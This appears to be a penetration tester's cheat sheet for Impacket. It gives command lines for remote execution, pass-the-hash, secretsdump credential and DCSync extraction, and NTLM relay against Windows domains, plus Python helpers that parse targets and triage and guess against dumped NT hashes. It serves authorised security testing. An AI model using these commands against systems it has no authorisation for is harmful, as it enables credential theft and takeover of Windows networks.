Impacket

Impacket is a collection of Python classes and example scripts for working with Windows network protocols (SMB, MSRPC/DCOM, LDAP, Kerberos, NTLM and others), maintained by Fortra. The library gives low-level, programmatic access to the packets and protocol implementations; the bundled example scripts (psexec.py, secretsdump.py, ntlmrelayx.py and so on) turn that into ready-made tooling. Penetration testers use them for network reconnaissance, credential extraction, remote code execution and lateral movement within Windows domains.

Installation and Setup

Install on Kali Linux

sudo apt update && sudo apt install impacket-scripts                  #Kali exposes the scripts as impacket-<name> (impacket-psexec, impacket-secretsdump, ...) rather than <name>.py

Install on Debian/Ubuntu

sudo apt update && sudo apt install python3-impacket

Install via pipx (Recommended)

python3 -m pipx install impacket

Install from Source

git clone https://github.com/fortra/impacket.git
cd impacket
pip install .

Tools Overview

Impacket provides tools for interacting with Windows networking: SMB, MSRPC, DCOM, Kerberos, LDAP/Active Directory and related protocols. Below is a cheat sheet of the scripts I use most often in penetration tests. Every command takes the same target string, DOMAIN/USER:PASSWORD@TARGET; leave out :PASSWORD to be prompted, or replace it with -hashes LMHASH:NTHASH, -k -no-pass (Kerberos ticket from KRB5CCNAME) or -aesKey.

wmiexec.py – Remote Command Execution via WMI

wmiexec.py DOMAIN/USER:PASSWORD@TARGET                               #Semi-interactive shell; each command runs via Win32_Process.Create and output is read back from a file on the ADMIN$ share
wmiexec.py -hashes LMHASH:NTHASH DOMAIN/USER@TARGET                  #Pass-the-Hash; a leading colon (-hashes :NTHASH) means the LM half is empty
wmiexec.py -nooutput DOMAIN/USER:PASSWORD@TARGET                     #Run the command without collecting output (nothing is written to the share)
wmiexec.py DOMAIN/USER@TARGET                                        #Omit the password and the script prompts for it (keeps it out of shell history); -A takes an smbclient-style auth file, it is not a prompt switch
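Every script on this page takes the same DOMAIN/USER:PASSWORD@TARGET string, and the corner cases (passwords containing '@', UPN-style usernames, the -hashes LMHASH:NTHASH format) are where commands silently go wrong. The following is an added example, not code from Impacket itself: it reproduces the target regex and the '@' fix-up that parse_target() in impacket/examples/utils.py uses (check it against your installed version), and adds a small validator for the -hashes argument. Sample target strings are constructed.

```python
import re

# Regex as used by parse_target() in impacket/examples/utils.py (reproduced from the
# upstream source; confirm against the version you have installed).
TARGET_RE = re.compile(r"(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)")

# Well-known LM hash of an empty password; Impacket also accepts an empty LM half.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
HEX32 = re.compile(r"^[0-9a-fA-F]{32}$")


def parse_target(target: str) -> dict:
    """Split DOMAIN/USER:PASSWORD@HOST the way the Impacket example scripts do."""
    domain, username, password, remote = TARGET_RE.match(target).groups("")
    # Upstream fix-up for passwords containing '@': the regex stops the password at the
    # first '@', so everything up to the last '@' is handed back to the password.
    if "@" in remote:
        password = password + "@" + remote.rpartition("@")[0]
        remote = remote.rpartition("@")[2]
    return {"domain": domain, "username": username, "password": password, "target": remote}


def split_hashes(value: str) -> tuple:
    """Validate a -hashes argument. Impacket splits it on ':' as LMHASH:NTHASH."""
    if value.count(":") != 1:
        raise ValueError("expected LMHASH:NTHASH (a leading ':' means the LM hash is empty)")
    lm, nt = value.split(":")
    lm = lm or EMPTY_LM          # normalise the empty LM half to the well-known constant
    if not HEX32.match(lm) or not HEX32.match(nt):
        raise ValueError("each hash must be exactly 32 hex characters")
    return lm.lower(), nt.lower()


if __name__ == "__main__":
    # Constructed examples: the last one shows why a UPN (user@domain) cannot be used as the username.
    for t in ("CORP/alice:Summer2024!@10.1.1.5",
              "CORP/alice@10.1.1.5",
              "CORP/alice:p@ss:w0rd@dc01.corp.local",
              "alice@corp.local:pw@dc01"):
        print(f"{t:45s} -> {parse_target(t)}")
    print(split_hashes(":8846F7EAEE8FB117AD06BDD830B7586C"))
```

The UPN case parses "alice" as the user and "@corp.local:pw" as the password, so use DOMAIN/USER, never user@domain, in the target string; a password that contains '@' is fine, a username that does is not.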

psexec.py – Remote Execution Over SMB

psexec.py DOMAIN/USER:PASSWORD@TARGET                                #Uploads a service binary to a writable share (ADMIN$ by default), creates and starts a service, then talks to it over a named pipe; interactive SYSTEM shell
psexec.py -hashes LMHASH:NTHASH DOMAIN/USER@TARGET                   #Pass-the-Hash
psexec.py -target-ip 10.1.1.1 DOMAIN/USER:PASSWORD@TARGET            #Connect to this IP while the name in the target string is used for authentication (Kerberos/SPN)
psexec.py -service-name CustomSvc DOMAIN/USER:PASSWORD@TARGET        #Name of the service that is created; the install is still logged (System event ID 7045)

smbexec.py – Execute Commands via SMB

smbexec.py DOMAIN/USER:PASSWORD@TARGET                               #Semi-interactive shell; each command runs through a temporary service and its output is read from a share on the target
smbexec.py -hashes LMHASH:NTHASH DOMAIN/USER@TARGET                  #Pass-the-Hash execution
smbexec.py -share C$ DOMAIN/USER:PASSWORD@TARGET                     #Share the output file is read from (default C$); there is no -shares flag and smbexec.py does not list shares
smbexec.py -mode SERVER DOMAIN/USER:PASSWORD@TARGET                  #Output is written back to an SMB server started locally (needs root); default is SHARE. There is no Task Scheduler mode, that is atexec.py

dcomexec.py – Remote Execution via DCOM

dcomexec.py DOMAIN/USER:PASSWORD@TARGET                              #Semi-interactive shell over DCOM (default object: ShellWindows)
dcomexec.py -hashes LMHASH:NTHASH DOMAIN/USER@TARGET                 #Pass-the-Hash execution
dcomexec.py -object MMC20 DOMAIN/USER:PASSWORD@TARGET                #Use the MMC20.Application object instead (choices: ShellWindows, ShellBrowserWindow, MMC20)

atexec.py – Task Scheduler Execution

atexec.py DOMAIN/USER:PASSWORD@TARGET whoami                         #Creates a scheduled task that runs the command, reads the output from ADMIN$, then deletes the task; the command argument is required
atexec.py -hashes LMHASH:NTHASH DOMAIN/USER@TARGET whoami            #Pass-the-Hash
atexec.py -debug DOMAIN/USER:PASSWORD@TARGET whoami                  #Enable debug output

secretsdump.py – Extract Credentials and Hashes

secretsdump.py DOMAIN/USER:PASSWORD@TARGET                           #Dump SAM, LSA secrets and cached credentials from a host (needs local admin); against a DC it also pulls NTDS via DRSUAPI
secretsdump.py -hashes LMHASH:NTHASH DOMAIN/USER@TARGET              #Pass-the-Hash
secretsdump.py -just-dc-ntlm DOMAIN/USER:PASSWORD@DC                 #DCSync only the NTLM hashes from NTDS (needs replication rights, e.g. Domain Admin or a DCSync ACL)
secretsdump.py -just-dc-user krbtgt DOMAIN/USER:PASSWORD@DC          #Limit the DCSync to one account instead of the whole directory
secretsdump.py -outputfile hashes DOMAIN/USER:PASSWORD@TARGET        #Write results to hashes.ntds / hashes.sam / hashes.secrets (one file per source) instead of stdout
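What comes out of secretsdump.py is a list of user:rid:lmhash:nthash::: lines, and the nthash field is exactly the value the other scripts accept with -hashes :NTHASH. The added example below (my own code, not part of Impacket) does two things a tester does with that output: it shows what an NT hash actually is (MD4 over the UTF-16LE password, no salt, implemented in pure Python because hashlib's md4 is often unavailable under OpenSSL 3) and it triages a dump for empty passwords, accounts that still have an LM hash stored, and accounts sharing the same NT hash. The dump below is constructed in secretsdump's output format; the krbtgt and DC01$ hashes are made up, the others are the real NT/LM hashes of "password".

```python
import re
import struct

MASK32 = 0xFFFFFFFF
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of an empty/disabled LM password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password (MD4 of b"")


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (hashlib's md4 is frequently disabled on OpenSSL 3)."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (  # (boolean function, additive constant, shift amounts, message word order)
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000, (3, 7, 11, 19),
         (0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for f, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                # Each step updates one register; rotating the tuple keeps the a/d/c/b order of the spec.
                a, b, c, d = d, _rotl((a + f(b, c, d) + X[idx] + k) & MASK32, shifts[i % 4]), b, c
        h = [(x + y) & MASK32 for x, y in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> str:
    """The value passed as -hashes :NTHASH: MD4 over the UTF-16LE password, unsalted."""
    return md4(password.encode("utf-16le")).hex()


# user:rid:lmhash:nthash:::  with the optional "(status=...)" suffix secretsdump adds with -user-status
DUMP_LINE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::"
    r"(?:\s*\(status=(?P<status>\w+)\))?\s*$"
)


def parse_secretsdump(text: str) -> list:
    """Extract the hash records from secretsdump output, ignoring [*] status lines."""
    entries = []
    for line in text.splitlines():
        m = DUMP_LINE.match(line.strip())
        if m:
            entries.append(m.groupdict())
    return entries


def triage(entries: list) -> dict:
    shared = {}
    for e in entries:
        shared.setdefault(e["nt"], []).append(e["user"])
    return {
        "empty_password": [e["user"] for e in entries if e["nt"] == EMPTY_NT],
        "lm_stored": [e["user"] for e in entries if e["lm"] != EMPTY_LM],   # LM storage still enabled
        "shared_nt": {h: u for h, u in shared.items() if len(u) > 1},        # password reuse
        "hashcat_lines": [f'{e["user"]}:{e["nt"]}' for e in entries],        # hashcat -m 1000 --username
    }


def check_guesses(entries: list, guesses: list) -> dict:
    """Offline check of a few candidate passwords against the dumped NT hashes."""
    by_hash = {}
    for e in entries:
        by_hash.setdefault(e["nt"], []).append(e["user"])
    return {g: by_hash[nt_hash(g)] for g in guesses if nt_hash(g) in by_hash}


# Constructed sample in secretsdump's NTDS output format (not a real dump).
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
corp.local\\svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
corp.local\\jdoe:1106:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c::: (status=Enabled)
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
[*] Cleaning up...
"""

if __name__ == "__main__":
    entries = parse_secretsdump(SAMPLE_DUMP)
    report = triage(entries)
    print("empty password :", report["empty_password"])
    print("LM hash stored :", report["lm_stored"])
    for h, users in report["shared_nt"].items():
        print("shared NT hash :", h, "->", users)
    print("guess hits     :", check_guesses(entries, ["password", "Winter2024!"]))
```

Three accounts sharing one NT hash means one crack (or one pass-the-hash) opens all three, which is the point of looking at the dump before feeding it to hashcat; and an account whose LM field is not aad3b435... tells you LM storage is still enabled on that domain, which is a finding on its own.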

rpcdump.py – Dump RPC Endpoints

rpcdump.py DOMAIN/USER:PASSWORD@TARGET                               #List Exposed RPC Endpoints
rpcdump.py -target-ip 10.1.1.1 DOMAIN/USER:PASSWORD@TARGET           #Specify Target IP

samrdump.py – Enumerate SAM Accounts

samrdump.py DOMAIN/USER:PASSWORD@TARGET                              #Enumerate SAM User Accounts
samrdump.py -hashes :NTLM_HASH DOMAIN/USER@TARGET                    #Use NTLM Hash for Authentication

ntlmrelayx.py – NTLM Relay Attacks

ntlmrelayx.py -t TARGET                                              #Relay captured NTLM authentication to one target (smb:// unless another scheme is given); -tf FILE takes a list
ntlmrelayx.py -smb2support -t TARGET                                 #Accept SMB2/3 from victims; needed for any current Windows client. SMB relay only works if the target does not require signing
ntlmrelayx.py -smb2support -t ldap://DC_IP --delegate-access         #Relay to LDAP, create a computer account and grant it RBCD over the victim host; blocked when the DC enforces LDAP signing (channel binding for ldaps://)
ntlmrelayx.py --remove-mic -t TARGET                                 #Strip the NTLM MIC (CVE-2019-1040) so an authentication that negotiated signing can still be relayed; double-dash flag, unrelated to NTLMv1

Output, Kerberos and Debugging Options

wmiexec.py -silentcommand DOMAIN/USER:PASSWORD@TARGET whoami         #Run the command directly instead of through cmd.exe; no output and no file on the share (the flag is -silentcommand, not -silent)
secretsdump.py -k -no-pass DOMAIN/USER@DC_FQDN                       #Authenticate with the Kerberos ticket in KRB5CCNAME; -no-pass only suppresses the password prompt, it does not bypass authentication
ntlmrelayx.py --no-wcf-server --no-raw-server -debug -t TARGET       #Start only the SMB and HTTP listeners and print debug output (the listener switches are double-dash)
psexec.py -service-name CustomSvc -remote-binary-name svc.exe DOMAIN/USER:PASSWORD@TARGET   #psexec.py has no output-suppression flag; the service name and the uploaded binary name are what you can change

Best Practices

secretsdump.py -k -no-pass DOMAIN/USER@DC_FQDN                       #Prefer Kerberos (ticket in KRB5CCNAME, target by FQDN) over NTLM where the engagement allows it
secretsdump.py -just-dc-user krbtgt DOMAIN/USER:PASSWORD@DC_IP       #Scope a DCSync to the accounts you need instead of pulling the whole NTDS
ntlmrelayx.py -smb2support -t ldap://DC_IP --delegate-access         #Relay only to hosts confirmed not to require signing; record the computer account and delegation entry it creates so they can be removed
wmiexec.py -nooutput DOMAIN/USER:PASSWORD@TARGET                     #Skip the output file on the target when you do not need results back
smbexec.py -mode SERVER DOMAIN/USER:PASSWORD@TARGET                  #Read output through your own SMB server (needs root locally) rather than writing it to a share on the target